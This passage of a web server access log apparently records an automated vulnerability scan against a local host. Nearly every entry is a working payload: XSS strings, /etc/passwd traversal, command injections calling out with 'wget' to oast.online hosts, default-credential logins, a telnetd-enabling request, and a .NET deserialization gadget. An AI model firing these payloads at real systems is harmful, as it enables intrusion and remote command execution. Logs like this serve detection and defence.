1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup/index.php?page=servers&mode=test&id=\x22>'> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('297MFhkl9F4SSRyQmIE3NTtLMbO')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\x22'; wget http://c9v8gc8smpv8b0ng0t00qseyygtjhca1p.oast.online #","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide-scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"userName=admin&password=axis2&submit=+Login+","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /axis2/axis2-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/__swagger__/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hybris/hmc/hybris HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode(\x22R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\x22))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /images/..%2fapply_abstract.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /intikal/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kb_view_customer.do?sysparm_article=KB00xxxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apt/v1/context HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/setup/index.php?page=servers&mode=test&id=\x22>'> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"command=2&ipAddr=&dnsAddr=$(wget+http://c9v8gc8smpv8b0ng0t009zsfzfi67xe67.oast.online)&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi/networkDiag.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graphql?query={__typename} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\x22'; wget http://c9v8gc8smpv8b0ng0t00zsjqgjne435oh.oast.online #","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/products HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfmx/CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/_swagger_/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /confluence HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0A/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dispatcher/invalidate.cache HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elocker_old/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /h2-console/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/latest_runs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/mainfunction.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/store/storeConfigs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / 